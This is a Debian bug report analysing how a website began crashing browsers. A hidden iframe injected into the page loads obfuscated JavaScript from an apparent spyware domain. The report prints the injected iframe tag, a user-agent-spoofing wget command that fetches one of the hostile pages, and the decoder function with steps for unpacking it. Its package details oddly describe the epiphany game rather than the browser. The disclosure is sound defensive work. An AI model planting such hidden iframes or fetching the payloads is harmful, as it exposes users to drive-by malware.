Package: epiphany Version: 0.5.1-4 Severity: serious Tags: security I'm seeing this bug using epiphany, but also with other related web browsers (firefox/iceweasel), so you'll probably want to pass it up the library chain.
Today something apparently changed on the sfreviews.net site, since when I visited it, epiphany began to use > 400 mb of memory and just sucked down more and more until things got ugly. It had been ok yesterday. I'm ccing its webmaster, since I trust him, and his normally well-behaved and informative site is doing something very wrong and strange. The strange thing seems to be this, near the end of the sfreviews.net front page: <iframe name="3" src="http://andyserver.info/check/version.php?t=179"; width=1 height=1 style="display:none"></iframe></body> I don't know what this is there for, but it yeilds the file I've named "crashme.html" in the attached tarball. This is where things get dodgy, because andyserver.info appears to be a spyware domain (just google for it). It would be nice if attempted windows trojans didn't accidentially crash our web browsers.. crashme.html contains 9 more iframes named n1404-[1-9].htm. andyserver.info doesn't allow you to wget these unless you fool with the user-agent string and pretend to be a real web browser: [EMAIL PROTECTED]:~>wget -U "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.6) Gecko/20070801 (Debian-1.8.1.6-1) Epiphany/2.18" 'http://andyserver.info/check/n1404-8.htm' Just loading n1404-3.htm causes epiphany to use 229 mb of memory. The others increase the memory usage by different amounts, apparently. When they're all loaded together as is done by the iframe in crashme.html, the result is not pretty. These files are where things get really strange and ugly, since they consist of a pile of obfuscated javascript. The javascript can be decoded in 2 stages. First, replace the first "document.write" with "alert". This yeilds an alert box with the second-stage decoder: function twxcdimun(rrr){var temp=""; document.write("------------"); var ccc=0; var out="";var str=rrr;l=str.length;while(ccc<=str.length-1){while(str.charAt(ccc)!='N')temp=temp+str.charAt(ccc++);ccc++;out=out+String.fromCharCode(((parseInt(temp,16)-84)));temp="";}document.write(out);} Then just replace the if block you modified before with the above code, and modify the new code s/document.write/alert/ again. This yeilds a new page with yet more javascript in it, I've not tried to work out what this second layer is supposed to do, although it does contain yet a third layer, encoded just as badly. Workaround: Disable javascript :-/ or null-route andyserver.info -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-1-686 (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages epiphany depends on: ii epiphany-data 0.5.1-4 required maps for epiphany game ii libc6 2.6.1-2 GNU C Library: Shared libraries ii libclan2c2a-sound 0.6.5-1-4 Sound module for ClanLib game SDK ii libclanlib2c2a 0.6.5-1-4 ClanLib game SDK core runtime ii libgcc1 1:4.2.1-5 GCC support library ii libstdc++6 4.2.1-5 The GNU Standard C++ Library v3 epiphany recommends no packages. -- no debconf information -- see shy jo
evil.tar.gz
Description: Binary data
signature.asc
Description: Digital signature
